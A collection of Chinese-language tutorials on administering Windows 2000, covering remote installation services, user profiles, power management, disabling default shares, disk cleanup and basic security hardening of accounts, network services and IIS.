Windows 2000 远程安装服务大大的简化了在客户机上安装操作系统的过程，在 Windows 2000 中提供了一种客户机在初始化阶段与服务器连接的特殊机制，允许服务器控制客户机上 Windows 2000 Professional 的本地安装。这项服务即可以用于在客户机上安装和配置新的操作系统，也可以用于恢复崩溃的客户机的操作系统。远程安装服务和 IntelliMirror 是 Windows 2000 服务器中新变化和配置管理功能。通过远程安装服务与其他 IntelliMirror 功能（如用户文档和设置、软件安装及组策略）的结合，每个单位都会从改进的灾难性恢复、更简便的操作系统和应用程序管理中受益，其结果直接导致所需的技术支持服务减少。

可以使用远程安装服务，对新客户机进行远程设置， 现在用户可以利用客户机登录到网络中或使用合法帐户登录等方法激活远程安装服务，在客户机上安装操作系统。
    在使用远程安装服务时需要三个 Windows 2000 Server 的组件的支持。它们可以单独安装在不同的服务器上，也可以安装在同一台服务器上。它们是：
§　域名服务器（DNS Server）
§　动态主机配置协议服务器（DHCP Server）
§　活动目录服务（ADS）
    客户机登录到网络与运行远程安装服务的服务器建立连接，服务器通过由计算机生产商提供的唯一的机器 ID （GUID、UUID）设备相应的客户机。在远程安装服务检测到客户机的请求后，根据设置的不同它可以利用两种方式响应客户机的请求：通过客户机的机器 ID 识别客户机实现不同的远程安装；对所有的客户机的请求进行响应。
    远程安装服务使用了 Windows 2000 中新的"启动预执行环境（PXE）"中的"动态主机配置协议（DHCP）"中的远程启动服务，在客户机的本地硬盘上安装保存在远程资源中的预配制的操作系统，它与从本地 CD-ROM 中安装 Windows 2000 Professional 具有相同的效果，不同点在于安装程序保存在 RIS 服务器上。

远程是指配置了远程安装服务的服务器，服务器上保存着要安装的操作系统的映象文件，映象文件分为两种：一种是光盘格式，与在本地利用 Windows 2000 Professional 安装光盘安装一样，只不过是将光盘文件存放在网络上一样；另一种是远程安装预备向导格式，通过客户机的 BIOS 中的网络启动服务，或制作的远程启动盘启动客户机，在网络服务请求启动时，客户机将收到一个由 DHCP 服务器提供的 IP 地址，然后远程安装服务响应客户机的请求，并下载安装向导到客户机，在提示用户以合法身份登录后，显示可能的安装选项菜单，这些安装选项是由组策略为用户确定的。
    远程安装服务服务器包含下列组件：
§　客户机安装向导：提供用户按步骤完成客户机安装所需的配置选项
§　远程安装预备向导：用于准备一个已有的 Windows 2000 Professional 的安装，包括本地安装和配置，及在网络上将该安装映象文件复制到其它的远程安装服务服务器上。
§　远程启动盘：当客户机的网卡不支持远程启动时，可以利用远程启动盘提供客户机箱服务器请求网络服务的操作
    在远程服务配置完成后，它自动提供以下服务：
    启动信息协商层（BINL）：负责监听客户机的远程安装请求，并提供对远程安装服务的管理， BINL 保证传递给客户机的安装文件的准确性，在预处理客户机时，确保是由正确的远程安装服务器提供的服务。
    小文件传输协议后台程序（TFTPD）：远程安装服务器利用 TFTPD 下载安装过程所需的初始化文件，从客户机下载的最常见的文件是 startrom.com 文件，它负责启动安装 Windows 2000 Professional 到客户机，如果是新的客户机，将下载 OSChooser 向导程序，并启动安装程序。

单个实例存储（SIS）：用于降低服务器上远程安装服务对服务器磁盘容量的要求。SIS 利用一个程序扫描上是否有重复文件，如果有重复文件它将源文件复制到 SIS 存储区中，并在文件原有的位置上创建一个链接文件。

    2、 远程安装服务的规划
    "远程安装服务"环境依赖于设计和规划良好的 Active Directory 体系结构。一般来说，确定服务器的物理位置可能是一件比较麻烦的事，尤其是在不同的办公室、楼层或建筑中配置几台服务器时。在给定的域中，Active Directory 提供了组织单位或容器，用户可以使用它将用户和资源组织到逻辑管理组中。
    如果此服务器是域控制器，则"远程安装服务"服务器计算机的对象位于域控制器文件夹中。管理员可以在一个地方管理涉及客户机服务、服务器验证、定位客户机以及确定操作系统安装选项的独立远程安装服务器。

3 、远程安装服务的安装
    步骤1 在"控制面板"中双击"添加、删除程序"→选择 Widows 组件→选择"远程安装服务"→启动安装向导

    如图3.1

步骤2 输入远程安装文件夹的位置，注意如果在主域控制器上安装此文件夹则此文件夹不能设置在系统盘上

    如图3.2

步骤3 如果希望在安装后服务器立即开始工作，则在初始设置中选择"响应客户计算机请求服务"

    如图3.3

步骤4 输入安装源文件位置，即 Windows 2000 Professional 安装盘的位置
    如图3.4

步骤5 如果远程安装的 Windows 2000 Professional 操作系统为英文版，则需要添加一个语言选择屏幕，以便用户服务新映射。
    如图3.5

步骤6 输入安装映象文件夹名称
    如图3.6

    步骤7 为安装映象提供相应的描述和帮助说明
    步骤8 在复查设置对话框中单击完成，开始安装复制Windows 2000 Professional到相应文件夹中，在系统重新启动后远程安装服务开始使用。
    如图3.7

4、 远程安装服务的设置
    远程安装服务提供了一些配置选项，这些安装配置选项规定了如何安装和配置客户机。用户利用微软管理控制台中的 Microsoft Directory Services Manager 管理单元对其进行管理，下列是常用的配置选项。
    在活动目录的用户和计算机管理控制台中，右击已安装远程安装服务的服务器，选择属性，在远程安装标签中如图 3.8，如选定"响应客户计算机的服务请求"，可以为客户机提供远程安装服务；如选定"不响应未知客户计算机"则没有在活动目录中定义的计算机，无法获得远程安装服务；如果在安装时出现问题，则单击"验证服务器"检查服务器的配置是否正常。
    如图3.8

在"高级设置"中用户可以实现一些远程安装的高级设置。
    新客户设置：在"客户计算机命名格式"列表框中选择自动的客户机命名格式，它决定了客户机的名称是基于用户名产生（姓在前，名在后），还是由企业特定的客户命名格式传输客户机名称。
    在"客户帐户位置"列表框中列出为所有客户机帐户定义的默认 Active Directory 位置，管理员如选择了默认得 Active Directory 位置，则在安装操作系统的过程中所有的远程安装计算机均在此位置创建。
    如图3.9

映象配置：管理员利用添加映象的方法将不同的无人参与的安装模板与现有的操作系统映象连接在一起供不同需求的客户机安装。
    如图3.10。

工具：为管理员和用户提供第三方供应商提供的维护和诊断工具，这些工具在加载和安装操作系统之前对客户机诊断和维护。
相关工具：
    RBFG.EXE：（位于\\servername\remoteinstall\admin\i386\RBFG.EXE）用于创建远程启动盘
    RIPREP.EXE：（位于\\servername\remoteinstall\admin\i386\ RIPREP.EXE）在客户机上运行该程序，建立远程安装的预处理映象。
    如图3.11

5 、客户机的安装配置
    在进行客户机远程安装服务前，在Active Directory 用户和计算机控制台中可预处理客户机帐户（包括：创建客户机名称、选择默认的Active Directory位置、指定客户机进行远程安装的服务器），以便服务器只在授权的服务器上进行远程安装。
    客户机是由全局唯一标识（GUID）加以区分的，GUID位于计算机的硬件中。
    在客户机与远程安装服务器建立连接后，安装向导在客户机上列出一个可用的安装选项菜单，远程安装服务根据组策略中为用户制定的选项，决定那些安装选项对相应的客户起作用，管理员可以灵活的分配给不同级别用户以不同的选项，并使得相应的安装自动完成不需要用户提示信息。具体选项如下：
§　自动安装：为安装操作系统提供了最便捷的方法，用户选择所要安装的操作系统自动开始安装
§　自定义安装：允许管理员取消自动安装程序，采用常规的安装方式
§　重新开始以前的安装：如果以前的安装失败，采用此选项自动重新开始安装操作系统
§　维护和疑难解答：利用服务商提供的工具在安装操作系统之前对客户机进行诊断和更新等操作。

   设置用户配置文件
    在运行 Windows 2000 的计算机上，用户配置文件将自动创建和维护本地计算机上的每个用户工作环境的桌面设置。当用户第一次登录到计算机的时候，系统为每个用户创建一个用户配置文件。
    用户配置文件为用户提供了多种便利：
§　多个用户可以使用同一台计算机，并且每个用户在登录时都会收到自己的桌面设置。
§　当用户登录到工作站时，将收到上次注销时的桌面设置。
§　一个用户对桌面环境的自定义设置不会影响其他用户的设置。
§　用户配置文件可以存储在服务器上，以便它们可以跟随用户到网络上任意一台运行 Windows NT 4.0 或者 Windows 2000 的计算机上。这称为"漫游用户配置文件"。
    用户配置文件为系统管理提供了以下选项：
§　可以创建适合用户任务的默认用户配置文件。
§　可以建立不保存用户对桌面设置所做更改的强制用户配置文件。用户可以在登录之后修改计算机的桌面设置，但是当用户注销的时候不保存任何更改。用户每次登录时，强制用户配置文件设置都会下载到本地计算机。
§　可以指定要添加到所有的个人用户配置文件中的默认用户设置。
    每个用户配置文件都是以"默认用户"的副本开始，"默认用户"是保存在每台运行 Windows 2000 的计算机上的默认用户配置文件。"默认用户"里的 Ntuser.dat 文件显示了 Windows 2000 注册表中的配置设置。每个用户配置文件还使用包含在"所有用户"文件夹中的常用程序组。虽然"所有用户"文件夹中的设置不复制到用户配置文件夹，但可以用来创建个人用户配置文件。Windows 2000 支持两种程序组类型：第一种公用程序组在计算机上总是可以，不管谁登录。第二种个人程序组供创建这些组的用户专用。

6、 用户配置文件的类型
    用户配置文件定义了自定义的桌面环境，包括个人显示设置、网络和打印机连接，以及其他指定的设置。用户或者用户的系统管理员可以定义桌面环境。用户配置文件类型包括：
§　本地用户配置文件。第一次登录到计算机时，将创建本地用户配置文件，并保存在计算机的本地硬盘上。对本地用户配置文件所做的任何更改都只是针对用户所在的计算机。
§　漫游用户配置文件。漫游用户配置文件由系统管理员创建，并保存在服务器上。每次登录到网络上的任何一台计算机时，都可以使用该配置文件。对漫游用户配置文件所做的更改将在服务器上更新。
§　强制用户配置文件强制用户配置文件也是漫游配置文件。用来为个人或整个用户组指定特殊的设置。只有系统管理员才能更改强制用户配置文件。

7、 创建及管理配置文件
    创建本地用户配置文件
对于 Windows 2000 Server 的全新安装的用户，本地用户配置文件将保存在 系统所在磁盘的 Documents and Settings 文件夹中的用户名下面。对于 Windows 2000 Server 的升级安装的用户，本地用户配置文件将保存在 WINNT\profiles 文件夹中的用户名下面。如果在服务器上用户没有预先配置的漫游用户配置文件，则该用户第一次登录到计算机时，系统会在该用户名称下创建一个用户配置文件夹。然后默认用户中的内容将复制到新用户配置文件夹中。用户配置文件，与"所有用户"文件夹中的公用程序组设置一起创建用户的桌面。当用户注销时，在会话期间对默认设置做的所有更改都会保存到新用户配置文件夹中。"默认用户"中的用户配置文件保持不变。
    注意：如果用户除了有一个域用户帐户外还有本地计算机上的用户帐户，或者有多个域用户帐户，那么每个帐户的本地用户配置文件将不同，因为不同的用户配置文件是为每个登录的用户生成的。当用户注销时，更改的设置只保存到其中的一个用户配置文件中，这取决于用户登录的帐户。

创建漫游或强制配置文件
    从 Active Directory 中，可以为用户配置文件指派服务器位置。如果在用户的域帐户中输入了用户配置文件的路径，那么当用户注销时，该用户本地用户配置文件的复本将保存到本地和用户配置文件路径位置。用户下次登录时，用户配置文件路径位置中的用户配置文件，将与本地用户配置文件夹中的副本进行比较，然后打开最新的用户配置文件副本。如果服务器不能使用，就使用本地缓存的漫游用户配置文件的复本。不论用户在什么地方登录，都可以使用他的用户设置和文档。
    注意：
    如果服务器不能使用，就使用本地缓存的漫游用户配置文件的复本。
    如果用户以前没有登录到计算机，则会创建新的本地用户配置文件。
    不论哪一种情况，如果登录时在中央保存的用户配置文件不能使用，那么当用户注销时该文件不会更新。
    如果用户配置文件由于服务器问题而没有下载，那么当用户注销时也不会加载该文件。
    下面用户将 Administrator 用户的配置文件配置成漫游或强制配置文件
    步骤1 使用户配置文件成为漫游或强制配置文件，在"计算机管理"中用"共享文件夹"在适当的服务器上创建共享 profiles，并授予 Everyone 组完全控制权限。
    步骤2 在控制台树的"本地用户和组"中，单击"用户"。
    步骤3 单击所需的用户帐户 Administrator。
    步骤4 单击"操作"，然后单击"属性"。

步骤5
在"配置文件"选项卡中，在"配置文件路径"中键入完整的路径，例如： \\N2k_server\profiles\Administrator 或\\N2k_server\profiles\Administrator .man（强制配置文件）如图3.12
    注意:
    要打开"计算机管理"，请单击"开始"，指向"设置"，单击"控制面板"，双击"管理工具"，然后双击"计算机管理"。

如果用户要登录运行 Windows NT 4.0 或 Windows 2000 的计算机，但不登录运行 Windows NT 3.x 的计算机，则用户配置文件路径不需要文件名。如果在用户配置文件路径中指定的文件夹不存在，则用户第一次登录时会自动创建此文件夹。
    如果用户要登录运行 Windows NT 3.x 的计算机，也要登录运行 Windows NT 4.0 或 Windows 2000 的计算机，则用户配置文件路径必须包含文件名。这个文件名可以是漫游用户配置文件 (.usr) 或强制用户配置文件 (.man)，例如：\\N2k_server\profiles\Administrator .man
    用户可以通过使用 Windows 资源管理器，将 ntuser.dat 文件重命名为 ntuser.man，来创建强制用户配置文件。强制用户配置文件是一个预先配置的用户配置文件。用户仍然可以改变桌面，但是当用户注销时，改变不会保存。下一次用户登录时，强制用户配置文件将重新下载。当用户将服务器上的 NTuser.dat 文件重命名为 NTuser.man时，用户配置文件就变成了强制用户配置文件。.man 扩展名使得用户配置文件只能读取。

将用户配置文件复制到服务器中
    步骤1 打开 "系统属性"对话框，然后单击"用户配置文件"选项卡。
    步骤2 在"用户配置文件"对话框中，单击要复制的用户配置文件。
    步骤3 单击"复制到"，然后键入目标文件夹的名称，或浏览网络查找目标文件。
    注意：
    这个位置必须与 Active Directory 中用户帐户的"用户配置文件路径"项相匹配。

    不能使用 Windows 资源管理器或任何其他文件管理工具，来复制用户配置文件。
    使用该步骤给指定用户发行配置文件，或为域中所有新用户准备默认的网络用户配置文件。

创建预先配置的漫游用户配置文件
    虽然可以使用任意帐户创建预配置的用户配置文件，但使用参照计算机会更加方便和有效。首先为需要创建预先配置漫游用户配置文件的用户或用户组创建一个配置文件模板，即利用以上所介绍的方法创建一个本地配置文件，并将其复制到指定的服务器上，前三步与"将用户配置文件复制到服务器中"相同
    步骤4 要改变允许使用用户配置文件的用户或组，请单击"更改"，选择需要使用这一配置文件的用户或组。
    如图3.14

注意：
    要复制用户配置文件，用户必须以管理员的身份登录到 Windows 2000 中。
    不要使用此步骤来创建指向"文档和设置"文件夹的本地用户配置文件。
    用户第一次登录时，从服务器得到的是预先配置的用户配置文件的副本，而不是默认配置文件的副本。因此，用户配置文件的功能与标准漫游用户配置文件相同。每次用户注销时，用户配置文件将在本地保存，同时也复制到服务器。
    Windows 2000 不支持将加密文件与漫游用户配置文件一起使用。
    直到交互式用户注销，并且交互式会话关闭时，终端服务客户使用的漫游用户配置文件才能复制到服务器中
    将宿主目录添加到配置文件中
    在 "Active Directory 用户和计算机"或"本地用户和组"中指定的主目录使用户可以访问的并包含该用户的文件和程序的文件夹。一般此文件夹用于在网络上存储用户的文件和程序，从私密和安全角度考虑，管理员也无权察看其中内容。
    步骤1 打开 Active Directory 用户和计算机。

步骤2 在控制台树的用户详细信息窗口中，右键单击可用的用户帐户。
    步骤3 单击"属性"。
    步骤4 在"属性"对话框中，单击"配置文件"选项卡。
    步骤5 在"主文件夹"中，键入目录信息。 如图3.13
注意：
    Windows 2000 包含一个称为我的文档的桌面文件夹，它可以用来存储要保存在宿主目录中的文件，但是不能代替宿主目录。所有用户在他们的用户配置文件中都有 "My Documents" 文件夹。
    用户可以改变自己的"我的文档"文件夹的目标文件夹位置，方法是右键单击该桌面图标，单击"属性"，然后在"目标"选项卡上指定新的位置。
    如果此处没有指派宿主目录，系统会将默认的本地宿主目录指派给用户帐户，默认宿主目录为用户升级安装 Windows 2000 的本地驱动器上的 \Users\Default ，或初始安装 Windows 2000 的根目录。宿主目录可以使用与"我的文档"文件夹相同的位置。
    当使用 "Windows 2000 终端服务时，用户配置文件是默认的宿主目录。

返回


浅析Windows 2000的电源管理

《一键清理系统垃圾》

浅析Windows 2000的电源管理

    Windows 2000（包括Microsoft Windows 2000 Professional、Microsoft Windows 2000 Server、Microsoft Windows 2000 Advanced Server）是基于NT核心的新一代操作系统（operating system，OS）。Win2000以其可靠、稳定的性能，强大的网络功能等优势受到大家的青睐。装Win2000的朋友也越来越多，我们很有必要深入了解了解Win2000。Win2000功能强大，对硬件的要求也较高，比较容易出现硬件兼容性方面的问题，其中我们遇到的兼容问题常常与电源管理有关：比如BOIS版本较早的机子无法安装Win2000、有些机子即使安装Win2000， 但启动休眠时出现死机、莫名其妙的出现CPU风扇不转、不能自动关机，需要手动关机等等。下面就让我们揭开Win2000电源管理的秘密。
    Windows 2000为了更稳定、更可靠采用了不少新技术，其中在电源管理方面同时支持高级电源管理Win2000 (Advanced Power Management, APM)、高级配置和电源接口(Advanced Configuration and Power Interface，ACPI) 两种电源管理方式。高级电源管理（APM）由支持在计算机中对可管理电源硬件进行电源管理的一个或多个软件层组成。 APM定义的是独立于硬件的软件接口，这个独立是指硬件特定的电源管理软件和操作系统电源管理策略驱动程序之间的独立。它不注重硬件的细节，使得高一级软件无须了解任何硬件接口，便可以使用APM。而高级配置和电源接口（ACPI）是开放式工业规范，它为主板定义了灵活、可扩充的硬件接口。软件设计人员使用此规范将电源管理功能集成在整个计算机系统中，包括硬件、操作系统和程序。 这种集成使 Win2000可以确定哪个程序处于活动状态，并处理计算机子系统和外围设备的所有电源管理资源。因此安装、运行Win2000的计算机主板BIOS 版本应支持ACPI，或某些基于APM 和即插即用设计BOIS版本的计算机。
    现在有些主板虽然支持ACPI功能，但支持并不怎么完善。如果在这样的机子上安装Win2000很可能回出现奇怪的问题。比如前几天的一个朋友安装Win2000 Professional，安装很顺利，但启动时出现了莫名其妙的怪事，在开机未进Win2000时机子一切正常，一进Win2000CPU风扇立马停转，退出Win2000后CPU风扇又开转，我帮他把BOIS刷到最新、全部硬件拔下重装、关掉Win2000的休眠，重起多次，一进Win2000CPU风扇仍然停转。没办法只有委屈APCI了，将BOIS里的ACPI Function设为Disable关闭ACPI，重起后又进不了Win2000。看来这位老兄的主板对ACPI支持不完善。正在一筹莫展的时候，我突然想起Win2000还支持高级电源管理（APM），那就不用ACPI，用APM。在BOIS里将ACPI关闭，用Win2000光盘重起机子，选择重新安装Win2000（不要选择修复安装）。等待了漫长的半小时，Win2000装完，重起后我一直盯着CPU风扇，呵呵……进Win2000后CPU风扇工作正常，我一阵狂喜。原来正是ACPI搞的鬼。

    那么如何知道自己的主板到底支不支持ACPI呢？告诉你一个办法，把你机子主板的BIOS刷到最新，在http://www.microsoft.com/hwdev/acpihct.htm下载ACPI HCT v1.61.exe，在Win98下运行测试一些BIOS是不是支持ACPI，如果支持，安装Win2000可能不会出现ACPI方面的问题；如果不支持，也能安装Win2000，只不过麻烦一点，改一些设置：将BIOS里的“ACPI Function"设为"Disable"。安装完Win2000后再将“开始”→“设置”→“控制面板”→“电源选项”→“高级电源管理”的“启动高级电源管理支持”设为启动。不过Win2000在APM方式不支持休眠，在APM状态休眠可能就是等于是关机。

    ACPI使计算机比较智能化，在微软的64位操作系统、Win2000的下一个版本Whistler将转向支持ACPI 2.0固定平台（ACPI 2.0 fixed tables），Whistler Beta 2其后Whistler的版本可能只支持ACPI 2.0，使用Whistler试用版的朋友如果出现启动休眠死机、不能关机等方面的问题，可能就是您的主板ACPI不完善，建议您关掉ACPI，如果还不行的话您可能还得回到温酒吧（Win98）！呵呵……


清除Windows 2000的系统默认“共享”

《一键清理系统垃圾》

清除Windows 2000的系统默认“共享”

    在Windows 2000以上的操作系统中，系统会根据计算机的配置，自动创建部分资源进行共享，以便于管理和系统本身使用。如果没有设置系统密码或者密码过于简单，利用一些软件就能立刻查到计算机的密码而侵入到计算机中。现在我们就来告诉大家怎样禁止这些默认共享。

    在Windows 2000中有个简单的方法就是使用“系统策略编辑器”，它是从Windows NT中继承下来的功能。从“开始”菜单处选择“运行”，输入“poledit”来启动该编辑器。从“文件”菜单中选择“打开注册表”，然后双击“本地计算机”弹出属性对话框。

    这时在“Windows NT网络”的“共享”下有两个选项：“创建隐藏的驱动器共享(工作站)”和“创建隐藏的驱动器共享(服务器)”。只要去掉相应选项的小钩(如图)，按“确定”后，回到系统策略编辑器，选择“保存”，最后重启系统即可删除默认的共享了。

    提示：Windows 2000 Professional系统的计算机应安装Windows管理工具(包含Poledit.exe)。访问系统安装盘上的i386目录，双击Adminpak.msi进行安装。


让Win2000变苗条

《一键清理系统垃圾》

让Win2000变苗条

    对我来说，再也没有比安装 Win2000时被花掉太多的硬盘空间而感到心痛的了，因为我还有很多东西要装啊!笔者在日积月累的应用中，逐渐积累了一些使Win2000瘦身变苗条的小技巧，供处于“水深火热”之中的朋友们参考。
    第一招，释放多余的虚拟缓存
    我们知道，虚拟缓存是以根目录下的系统隐藏文件 Pagefile.sys 作为其页面大小，缺省设置是物理内存的1.5倍，对于一般用户来说，这样的设置是奢侈了一点。在不运行像3DMAX这样巨量消耗内存的软件的情况下，还是可以节省一部分内存的。你可以根据自己的实际运行情况来定制，虚拟缓存的设置范围在 2MB到1.5倍物理内存之间。建议物理内存小于 64 MB的朋友最好不要使用这一招。
    设置方法如下：打开“控制面板”，选中“系统”，然后选择“高级”→“性能选项”，你就可以看到当前的设置，并可以设定你的虚拟页面。这样可以节约至少 382 MB左右的硬盘空间。
    第二招，精简系统驱动程序包
    当用户有 PNP 插件或新的设备加入时，Win2000 首先检查\WINNT\Driver Cache\i386 这一目录下的 Driver.cab压缩档中是否有对应的设备驱动程序。这一设备驱动 Cache 的特性使用户避免了频繁插入 Win2000 安装碟片之苦。对于几乎不进行硬件更换的朋友来说，如果所有的硬件都已配置妥当，并稳定地运行了一段时间后，可以安全地删除这一文档。这样可以节约硬盘空间 50 MB。
    第三招，最小化系统文件 Cache 区
    在 \WINNT\System32\DllCache 这个压缩目录下，是将 Win2000 必须的系统核心动态载入文档缓存区，它的目的是维护系统受损的文件和恢复被覆盖了的不兼容文档。一般情况下，不提倡对此目录进行精简。减少该缓冲区大小的方法是：在DOS提示符下运行Sfc.exe ／Purgecache 命令。完整的命令行如下：
    SFC [／SCANNOW] [／SCANONCE] [／SCANBOOT] [／CANCEL] [／ENABLE] [／PURGECACHE] [／CACHESIZE=x] [／QUIET]
    其中的参数意义如下：
    ／SCANNOW 立即扫描所有受保护的系统文件。
    ／SCANONCE 扫描所有受保护的系统文件一次。
    ／SCANBOOT 每次启动时扫描所有受保护的系统文件。
    ／CANCEL 取消所有暂停的受保护系统文件的扫描。
    ／QUIET 不提示用户就替换所有不正确的文件版本。
    ／ENABLE 为正常操作启用 Windows 文件保护
    ／PURGECACHE 清除文件缓存并立即扫描所有受保护的系统文件。
    ／CACHESIZE=x 设置文件缓存大小
    第四招，清除系统临时文件区
    在系统目录下的 \Documents and Settings\Administrator\Local Settings\Temp 这一系统隐藏目录下是软件安装时或运行时留下的临时目录和废弃的文档，清空这一目录（不能删除）可以节约200MB－500MB的空间。正确的方法是，首先以administrator 或有administrator权限的用户登录，然后关闭所有的窗口，关闭所有的用户程序。在系统目录下找到并打开 Documents and Settings文件夹，进入里面的 Administrator 子目录，然后在菜单的“工具”里打开“文件夹选项”，在“查看”这一栏里设置显示所有文件及文件夹，然后“确定”。这时，你就可以看见“Local Settings”文件夹，打开它，接着再打开“Temp”文件夹，不要管里面是些什么，按下 “Ctrl＋A” 全选，然后按“Del”，过后清空回收站。最后回到“工具”的“文件夹选项”恢复“不显示隐藏的文件和文件夹”。
    第五招，清除用户临时文件区
    在系统目录的 \WINNT\TEMP 下是用户安装时或运行时留下的临时目录和废弃的文档，在关闭所有的窗口，关闭所有的用户程序后，打开这一文件夹，按下 “Ctrl＋A” 全选，然后按“Del”，过后清空回收站。
    通过这五招，Win2000 即可减肥掉 500MB－800 MB，因为临时文件会经常产生，所以“第四”、“第五”招必须要经常用，还有，及时反安装（uninstall）不必要的软件才是使系统瘦身的根本办法。


大家共同分享

《一键清理系统垃圾》

大家共同分享

让Win 2000更安全
      根据美国国家计算机安全中心（NCSC）制定的可信任计算机系统评估标准（TCSEC）
，Win 2000属于
C2级安全级别。但Win 2000如接默认安装且不安装补丁和进行安全配置时，则谈不上是
C2级。本文从安
装Win 2000操作系统、账号安全管理、网络服务安全管理、数据文件安全管理等几个方
面对Win 2000的
安全管理进行描述，以使用户的Win 2000系统达到规定的安全级别。

      一、 正确安装Win 2000

      1．硬盘的分区

      在安装Win 2000时，如条件许可，应至少建立两个逻辑分区，一个用作系统分区，
另一个用作应用程
序分区。尽量修改“我的文档”及“Outlook Express”等应用程序的默认文件夹位置，
使其位置不在系
统分区。对提供Web服务的机器，可按如下设置分区:

      分区1：系统分区，安装系统和重要日志文件。

      分区2：提供给IIS使用。

      分区3：提供给FTP使用。

      分区4：放置其他一些资料文件。

      2．组件的定制

      不要按Win 2000的默认安装组件，根据安全原则“最少的服务+最小的权限=最大的
安全”，只选择确实需要的服务安装即可。

      典型Web服务器需要的最小组件是：

      公用文件、Internet 服务管理器、WWW服务器。

      3．接入网络时间

      在安装完成Win 2000操作系统时，不要立即把服务器接入网络，因为这时的服务器
还没有打上各种补
丁，存在各种漏洞，非常容易感染病毒和被入侵。

      补丁的安装应该在所有应用程序安装完之后，因为补丁程序往往要替换或修改某些
系统文件，如果先
安装补丁再安装应用程序有可能导致补丁不能起到应有的效果。IIS的HotFix要求每次更
改IIS的配置时都
需要重新安装。

      二、账户安全管理

      1．账户要尽可能少，并且要经常用一些扫描工具检查系统账户、账户权限及密码。
删除已经不再使用
的账户。

      2．停用Guest账号，并给Guest 加一个复杂的密码。

      3．把系统Administrator账号改名，尽量把它伪装成普通用户，名称不要带有Admi
n字样。

      4．不让系统显示上次登录的用户名，具体操作如下：

      修改注册表“HKLM\Software\Microsoft\ WindowsNT\ Current Version\Winlogon
\Dont Display
Last User Name”的键值，把REG_SZ 的键值改成1。

      三、网络服务安全管理

      1．关闭不必要的服务

      关闭不必要的服务，一些服务可能会给系统带来安全漏洞，如Win 2000的Terminal
Services（终端
服务）、IIS和RAS（远程访问服务）等。

      2．关闭不必要的端口

      当服务器只提供较单一的功能时，可考虑只开放某些端口。

      具体方法为：
按顺序打开“网上邻居→属性→本地连接→属性→internet 协议(tcp/ip)→属性→高级
→选项→tcp/ip
筛选→属性”，打开Tcp/Ip筛选，添加需要的Tcp、Udp协议即可。

      3．禁止建立空连接

      默认情况下，任何用户可通过空连接连上服务器，枚举账号并猜测密码。可以通过
以下两种方法禁止
建立空连接。

      （1）修改注册表

      Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值
改成1。

      （2）修改Win 2000的本地安全策略

      设置“本地安全策略→本地策略→选项”中的RestrictAnonymous（匿名连接的额外
限制）为“不容
许枚举SAM账号和共享”。

      四、网络服务安全配置

      1．终端服务

      （1）修改默认端口

      终端服务的默认端口为3389，可考虑修改为别的端口。修改方法为：

      服务器端：

      打开注册表，在“HKLM\SYSTEM\Current ControlSet\Control\Terminal Server\W
in Stations”处
找到类似RDP-TCP的子键，修改PortNumber值。

      客户端：

      按正常步骤建一个客户端连接，选中这个连接，在“文件”菜单中选择导出，在指
定位置会生成一个
后缀为.cns的文件。打开该文件，修改“Server Port”值为与服务器端的PortNumber对
应的值。然后再
导入该文件（方法：菜单→文件→导入），这样客户端就修改了端口。

      （2）安全审核

      在“管理工具→远程控制服务配置→连接”处，右键点击“RPD-TCP”连接，选择“
属性”，在其窗
口选中“权限”，点击右下角的“高级”，选择“审核”，增加一个“everyone”组，
审核它的“连接”、
“断开”、“注销”和“登录”的成功和失败。在“管理工具→日记查看→安全日记”
可看到该审核记录。

      2．Internet 服务管理器(IIS)安全配置

      对IIS服务安全配置如下：

      （1） 更改Web服务主目录。右键单击“默认Web站点→属性→主目录→本地路径”
，将“本地路径”
指向其他目录。

      （2） 删除原默认安装的Inetpub目录。

      （3） 删除以下虚拟目录: _vti_bin、IISSamples、s cripts、IIShelp、IISAdmi
n、IIShelp、MSADC。

      （4） 删除不必要的IIS扩展名映射。方法是：右键单击“默认Web站点→属性→主
目录→配置”，打
开应用程序窗口，去掉不必要的应用程序映射。如不用到其他映射，只保留.asp、.asa
即可。

      （5） 备份IIS配置。可使用IIS的备份功能，将设定好的IIS配置全部备份下来，这
样就可以随时恢复
IIS的安全配置。

      五、数据文件安全管理

      1．备份

      要经常把重要数据备份到专用的备份服务器，备份完毕后，可将备份服务器与网络
隔离。

      2．设置文件共享权限

      设置共享文件时，要注意把共享文件的权限从“everyone”组改成“授权用户”，
包括打印共享。

      3．关闭默认共享

      Win 2000安装好以后，系统会创建一些隐藏的共享，在cmd下可用net share命令查
看它们。要禁止这
些共享。操作方法是：打开“管理工具→计算机管理→共享文件夹→共享”，在相应的
共享文件夹上按右
键，点“停止共享”即可。不当过机器重新启动后，这些共享又会重新开启。

      4．防止文件名欺骗

      设置以下选项可防止文件名欺骗，如防止以.txt或.exe为后缀的恶意文件被显示为
txt文件，从而使
人大意打开该文件: 双击“我的电脑→工具→文件夹选项→查看”，选择“显示所有文
件和文件夹”属性
设置，去掉“隐藏已知文件类型扩展名”属性设置。


如何关闭WIN2000下面的消息服务

《一键清理系统垃圾》

如何关闭WIN2000下面的消息服务

进入控制面板的管理工具的服务里，双机messenger... 改为停止，并把启动条件改为手动

关闭win2000中的信使
控制面板->管理工具->服务
找到messenger
停止服务
然后改为禁用


使Windows 2000在关机后自动关闭电源

《一键清理系统垃圾》

使Windows 2000在关机后自动关闭电源

如何使Windows 2000在关机后自动关闭电源？

---- 我的机器安装了Windows 2000后，关机后不能自动关闭电源，每次还得手动关掉主机电源。以前安装Windows 98时可以自动关闭电源，请问如何使Windows 2000在关机后自动关闭电源？

---- 您可以先试试选择“控制面板”*“电源管理”*“高级选项”*“电源管理”，然后选择“启用高级电源管理支持”，确定后再关机试试看。如果仍然不行，您可以试试下面提供的修改注册表的方法。

运行注册表编辑器。
定位到“HKEY_LOCAL_ MACHINE\Software\Microsoft\ Windows NT\CurrentVersion\ Winlogon”。
在该子键下，如果存在键值“PowerdownAfterShutdown”，则将其值改为“1”后转到第(5)步。
如果不存在这个值，则按类型“REG_SZ”添加一个新的键值，然后将其值设为“1”。
关闭注册表编辑器。
---- 此外，还需要一个ATX电源和一个来自计算机厂家的升级文件hal.dll。如果没有此文件，您可以在Windows NT 4.0 Service Pack 4中找到一个名为hal.dll.softex的文件，该文件可在多个系统中运行。安装该文件后，可以在无计算机厂家的升级文件hal.dll的情况下实现自动关电功能。为安装hal.dll.softex，在MS DOS环境下运行如下命令:
---- cd %systemroot%\system32
---- rename hal.dll hal.old
---- copy g:\i386\hal.dll.softex hal.dll

---- 如此一来，计算机即可在系统关闭时自动关闭电源

附：

如何禁止自动开机问题？
